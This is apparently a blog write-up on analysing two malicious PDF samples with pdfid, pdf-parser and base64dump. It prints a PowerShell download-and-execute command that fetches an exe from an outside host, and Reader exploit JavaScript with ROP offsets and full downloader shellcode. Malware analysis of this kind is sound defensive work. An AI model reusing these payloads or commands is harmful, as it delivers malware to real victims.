|| Date: 18-06-17 ||
|| Tag: write-up ||

PDF Malware Analysis

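A PDF is a collection of elements: a header, a body of objects, a cross-reference table, and a trailer. Each indirect object in the body has the following form: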

X Y obj
endobj
// X is the object number
// Y is the version or generation number

Below is an example of an Indirect Object

1 0 obj
<<
    /Type /Page
    /AA << /O 43 0 R >>
>>
endobj

/AA stands for Additional Actions, which in practice means automatic actions tied to an event, and /O is the event of opening the page. This directs the PDF reader to perform the action stored in object #43, generation 0, as soon as the page is opened. The R at the end marks 43 0 as a reference to that indirect object.

/OpenAction is similar to /AA /O: it lives in the document catalog and executes an action when the document is opened.
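As a rough illustration of the X Y obj and X Y R notation, here is a minimal Python sketch that lists object definitions and indirect references in raw PDF bytes. The helper names and the sample bytes are made up for this example, and the regexes are deliberately naive: they know nothing about compressed streams or object streams, so treat this as a toy and not a replacement for pdf-parser.

```python
import re

# Naive patterns: "X Y obj" defines an object, "X Y R" references one.
OBJ_DEF = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
OBJ_REF = re.compile(rb"(\d+)\s+(\d+)\s+R\b")

def list_objects(raw: bytes):
    """Return (object number, generation) for every 'X Y obj' found."""
    return [(int(n), int(g)) for n, g in OBJ_DEF.findall(raw)]

def list_references(raw: bytes):
    """Return (object number, generation) for every 'X Y R' found."""
    return [(int(n), int(g)) for n, g in OBJ_REF.findall(raw)]

# Hypothetical sample, modelled on the indirect object shown earlier.
sample = b"1 0 obj\n<<\n /Type /Page\n /AA << /O 43 0 R >>\n>>\nendobj\n"
print(list_objects(sample))     # [(1, 0)]
print(list_references(sample))  # [(43, 0)]
```

Here object 1 0 points at object 43 0, which is where the action itself would live.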

A lot of malicious PDFs contain a JS stream that sprays the heap with shellcode and then exploits a vulnerability in the PDF reader to run it. If you encounter shellcode in a JS script, it's most probably encoded as Unicode escapes. Use base64dump.py -e pu (for %uXXXX escapes) or -e bu (for \uXXXX escapes) to extract it in a sexy, raw binary format.
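To make the Unicode encoding concrete, here is a minimal Python sketch of what such a decoder does: each \uXXXX or %uXXXX escape is a 16-bit value that is written out little-endian. The function name is hypothetical, and this is only an approximation of the idea, not base64dump.py's actual implementation.

```python
import re
import struct

def decode_u_escapes(text: str) -> bytes:
    """Turn \\uXXXX / %uXXXX escapes into raw little-endian bytes."""
    words = re.findall(r"(?:\\u|%u)([0-9a-fA-F]{4})", text)
    # Each escape is one 16-bit word; x86 shellcode stores it low byte first.
    return b"".join(struct.pack("<H", int(w, 16)) for w in words)

print(decode_u_escapes(r"\u9090\u77eb\uc931").hex())  # 9090eb7731c9
```

Note how \u77eb becomes the bytes eb 77: the two bytes of every escape are swapped in the output.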

Example 1

This example was taken from the SANS FOR610 course.

Running pdfid yields the following:

$ pdfid ctk.pdf
PDFiD 0.2.1 ctk.pdf
 PDF Header: %PDF-1.1
 obj                    5
 endobj                 5
 stream                 1
 endstream              0
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0

The result above shows one /OpenAction entry and one /Launch entry. /OpenAction means an action runs as soon as the document is opened, and /Launch means the document can start an external program. Together they should already raise a red flag.

Below is the output of pdf-parser:
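This kind of triage is easy to script. Below is a small Python sketch that takes pdfid's text output and keeps only the risky keywords with a non-zero count. The keyword list and the function name are my own choices for illustration, not something pdfid ships with.

```python
# Keywords worth a second look; this list is an assumption, tune it to taste.
SUSPICIOUS = (
    "/JS", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
    "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA",
)

def flag_keywords(pdfid_output: str) -> dict:
    """Return {keyword: count} for suspicious keywords with count > 0."""
    hits = {}
    for line in pdfid_output.splitlines():
        parts = line.split()
        # Only handle simple "keyword count" lines; anything else is skipped.
        if len(parts) == 2 and parts[0] in SUSPICIOUS and parts[1].isdigit():
            count = int(parts[1])
            if count > 0:
                hits[parts[0]] = count
    return hits

sample = """\
 /JS                    0
 /OpenAction            1
 /Launch                1
"""
print(flag_keywords(sample))  # {'/OpenAction': 1, '/Launch': 1}
```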

PDF Comment '%PDF-1.1\r\n'

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R

  <<
    /OpenAction
      <<
        /S /Launch
        /Win
          <<
            /F '(C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)'
            /P (powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBuAGMAZAB1AGcAYQBuAGQAYQAuAG8AcgBnAC8ALgBjAHMAcwAvAGEAdwBvAHIAaQAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQB3AG8AcgBpAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGEAdwBvAHIAaQAuAGUAeABlAB0gKQA= -windowstyle hidden)
          >>
      >>
    /Pages 2 0 R
    /Type /Catalog
  >>

...
...
...

trailer
  <<
    /Size 6
    /Root 1 0 R
    /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
  >>

Let’s break it down. The first element is the header (the %PDF-1.1 comment) and the last element is the trailer. The trailer is quite important: /Size gives the total number of entries in the cross-reference table, and /Root points to the document catalog, the object a reader processes first when the document is opened. Above, the /Root entry references 1 0 R, the first object in the document.

obj 1 0 contains an /OpenAction dictionary entry with a /Launch action. Its /Win dictionary targets Windows: /F names the program to launch (powershell.exe) and /P holds its parameters. The -EncodedCommand argument is Base64-encoded UTF-16LE text. Decoding it yields the following:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',”$env:APPDATA\awori.exe”);Start-Process (”$env:APPDATA\awori.exe”)
Looks like our PDF will download awori.exe and launch it. Fun!!
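The decoding step is simple enough to do by hand. PowerShell's -EncodedCommand expects Base64 over UTF-16LE text, so a minimal Python sketch (the function name is just for illustration) looks like this:

```python
import base64

def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE)."""
    return base64.b64decode(blob).decode("utf-16-le")

# The first ten characters of the command above, re-padded to stand alone.
print(decode_encoded_command("UABvAHcAZQByAFMAaABlAGwAbAA="))  # PowerShell
```

Feeding it the full /P blob from obj 1 0 gives the download-and-run one-liner shown above.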

Example 2

This malware sample was provided by SANS FOR610.

The following sample is named page.pdf

$ pdfid page.pdf
PDFiD 0.2.1 page.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 2
 endstream              2
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            0
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   1
 /Colors > 2^24         0

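We see that we have one /AcroForm entry and one /XFA entry. AcroForm is the PDF's interactive form dictionary; its /XFA entry holds an XML Forms Architecture (XFA) form, which can carry embedded JavaScript.

Examining the document’s trailer with pdf-parser reveals: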

trailer
  <<
    /Root 3 0 R
    /Size 7
  >>

Examining obj 3 0 reveals:

obj 3 0
 Type: /Catalog
 Referencing: 4 0 R, 2 0 R

  <<
    /Extensions
      <<
        /ADBE
          <<
            /ExtensionLevel 3
            /BaseVersion /1.7
          >>
      >>
    /Pages 4 0 R
    /AcroForm 2 0 R
    /Type /Catalog
    /NeedsRendering true
  >>

obj 3 0 references /AcroForm 2 0 R. Examining obj 2 0, and the obj 1 0 it points to, reveals:

obj 1 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /Length 403673
  >>


obj 2 0
 Type: 
 Referencing: 1 0 R

  <<
    /XFA 1 0 R
  >>

obj 2 0 references obj 1 0 through /XFA, and obj 1 0 contains a very large compressed stream. Luckily, pdf-parser can decompress /FlateDecode streams with --filter:

$ pdf-parser page.pdf --raw --filter -o 1 | vim -
Vim: Reading from stdin...

<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
   <?formServer defaultPDFRenderFormat acrobat9.1static?>
   <?formServer allowRenderCaching 0?>
   <?formServer formModel both?>
   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
         <pageArea name="Page1" id="Page1">
            <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
            <medium stock="default" short="612pt" long="792pt"/>
            <?templateDesigner expand 1?>
         </pageArea>
         <?templateDesigner expand 1?>
      </pageSet>
      <variables>
         <script name="util" contentType="application/x-javascript">
            function pack(i){
                var low = (i &amp; 0xffff);
                var high = ((i&gt;&gt;16) &amp; 0xffff);
                return String.fromCharCode(low)+String.fromCharCode(high);
            }
            function unpackAt(s, pos){
                return  s.charCodeAt(pos) + (s.charCodeAt(pos+1)&lt;&lt;16);
            }
            function packs(s){
                result = "";
                    for (i=0;i&lt;s.length;i+=2)
                    result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)&lt;&lt;8));
                    return result;
                }
            function packh(s){
                return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
                }
            function packhs(s){
                result = "";
                for (i=0;i&lt;s.length;i+=4)
                result += packh(s.slice(i,i+4));
                return result;
            }

            var _offsets =  {"Reader": {

                                         "9.303": {
                                                    "acrord32":    0x85,
                                                    "rop0":        0x14BA8,
                                                    "rop1":        0x1E73AF,
                                                    "rop1x":       0x2F12,
                                                    "rop2":        0x196774,
                                                    "rop3":        0xE475,
                                                    "rop3x":       0xE476,

We have a script!! The names sound lovely: unpackAt(), packs(), packh(). Looking a bit deeper, we can see a NOP sled in a variable called shellcode:

var shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u77eb\uc931\u8b64\u3071\u768b\u8b0c\u1c76\u5e8b\u8b08\u207e\u368b\u3966\u184f\uf275\u60c3\u6c8b\u2424\u458b\u8b3c\u0554\u0178\u8bea\u184a\u5a8b\u0120\ue3eb\u4934\u348b\u018b\u31ee\u31ff\ufcc0\u84ac\u74c0\uc107\u0dcf\uc701\uf4eb\u7c3b\u2824\ue175\u5a8b\u0124\u66eb\u0c8b\u8b4b\u1c5a\ueb01\u048b\u018b\u89e8\u2444\u611c\ue8c3\uff92\uffff\u815f\u98ef\uffff\uebff\ue805\uffed\uffff\u8e68\u0e4e\u53ec\u94e8\uffff\u31ff\u66c9\u6fb9\u516e\u7568\u6c72\u546d\ud0ff\u3668\u2f1a\u5070\u7ae8\uffff\u31ff\u51c9\u8d51\u8137\ueec6\uffff\u8dff\u0c56\u5752\uff51\u68d0\ufe98\u0e8a\ue853\uff5b\uffff\u5141\uff56\u68d0\ud87e\u73e2\ue853\uff4b\uffff\ud0ff\u6d63\u2e64\u7865\u2065\u632f\u2020\u2e61\u7865\u0065\u7468\u7074\u2f3a\u772f\u7777\u652e\u7078\u6f6c\u7469\u616d\u657a\u632e\u6d6f\u302f\u6131\u696b\u2e6e\u7865\u0065\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090";
var shellcode2 = shellcode[0] + util.pack((verB &lt;&lt; 16) | verA) + shellcode.substring(3);
var add_num = verA >= 11 ? 16 : 14;

So, we found some shellcode in a bunch of thank-god-it's-not-obfuscated JavaScript inside a PDF. Let’s hexdump the shellcode and see what we can find.

$ pdf-parser page.pdf --object 1 --filter --raw -d decoded_js.txt
$ base64dump.py -e bu decoded_js.txt
ID  Size    Encoded          Decoded          MD5 decoded
--  ----    -------          -------          -----------
 1:     900 \u4f4f\u4f4f\u4f OOOOOOOOOOOOOOOO ff23042711ff00cb5aedbf5ccef4df7a
 2:      24 \u5858\u5858\u56 XXXXxV4.         f3b3858bc27cf47d3c4ed57be1bd127b
 3:    6000 \u9090\u9090\u90  c6f73cbc08fa0754df7d1cee089e87ff
 4:       6 \u5858           XX               c51b57a703ba1c5869228690c93e1701
 5:       6 \u0000           ..               c4103f122d27677c9db144cae1394a66
 6:       6 \u0000           ..               c4103f122d27677c9db144cae1394a66
$ base64dump.py -e bu decoded_js.txt -s 3 -d > sc.bin
$ hexdump -C sc.bin 
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000020  eb 77 31 c9 64 8b 71 30  8b 76 0c 8b 76 1c 8b 5e  |.w1.d.q0.v..v..^|
00000030  08 8b 7e 20 8b 36 66 39  4f 18 75 f2 c3 60 8b 6c  |..~ .6f9O.u..`.l|
00000040  24 24 8b 45 3c 8b 54 05  78 01 ea 8b 4a 18 8b 5a  |$$.E<.T.x...J..Z|
00000050  20 01 eb e3 34 49 8b 34  8b 01 ee 31 ff 31 c0 fc  | ...4I.4...1.1..|
00000060  ac 84 c0 74 07 c1 cf 0d  01 c7 eb f4 3b 7c 24 28  |...t........;|$(|
00000070  75 e1 8b 5a 24 01 eb 66  8b 0c 4b 8b 5a 1c 01 eb  |u..Z$..f..K.Z...|
00000080  8b 04 8b 01 e8 89 44 24  1c 61 c3 e8 92 ff ff ff  |......D$.a......|
00000090  5f 81 ef 98 ff ff ff eb  05 e8 ed ff ff ff 68 8e  |_.............h.|
000000a0  4e 0e ec 53 e8 94 ff ff  ff 31 c9 66 b9 6f 6e 51  |N..S.....1.f.onQ|
000000b0  68 75 72 6c 6d 54 ff d0  68 36 1a 2f 70 50 e8 7a  |hurlmT..h6./pP.z|
000000c0  ff ff ff 31 c9 51 51 8d  37 81 c6 ee ff ff ff 8d  |...1.QQ.7.......|
000000d0  56 0c 52 57 51 ff d0 68  98 fe 8a 0e 53 e8 5b ff  |V.RWQ..h....S.[.|
000000e0  ff ff 41 51 56 ff d0 68  7e d8 e2 73 53 e8 4b ff  |..AQV..h~..sS.K.|
000000f0  ff ff ff d0 63 6d 64 2e  65 78 65 20 2f 63 20 20  |....cmd.exe /c  |
00000100  61 2e 65 78 65 00 68 74  74 70 3a 2f 2f 77 77 77  |a.exe.http://www|
00000110  2e 65 78 70 6c 6f 69 74  6d 61 7a 65 2e 63 6f 6d  |.exploitmaze.com|
00000120  2f 30 31 61 6b 69 6e 2e  65 78 65 00 90 90 90 90  |/01akin.exe.....|
00000130  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000007d0
$ 

A cursory glance with hexdump -C shows cmd.exe /c  a.exe and an HTTP URL. Now, we could examine it further with scdbg or wrap it as an exe and debug it to learn more about the shellcode, but I believe our work here is done.
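If you would rather not eyeball a hexdump, the same strings can be pulled out with a few lines of Python. This is a bare-bones take on the classic strings utility; the function name and the minimum length of 4 are arbitrary choices, and the sample bytes are copied from the tail of the hexdump above.

```python
import re

def ascii_strings(data: bytes, min_len: int = 4):
    """Return runs of printable ASCII at least min_len bytes long."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

# A few bytes taken from offsets 0xf2-0x12d of sc.bin as dumped above.
sample = (b"\xff\xd0cmd.exe /c  a.exe\x00"
          b"http://www.exploitmaze.com/01akin.exe\x00\x90\x90")
print(ascii_strings(sample))
# ['cmd.exe /c  a.exe', 'http://www.exploitmaze.com/01akin.exe']
```

On the real file you would read sc.bin in binary mode and pass its contents to the same function.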

Conclusion

There’s a process to examining malicious documents. Lenny Zeltser from SANS FOR610 mentions the following:

Till next time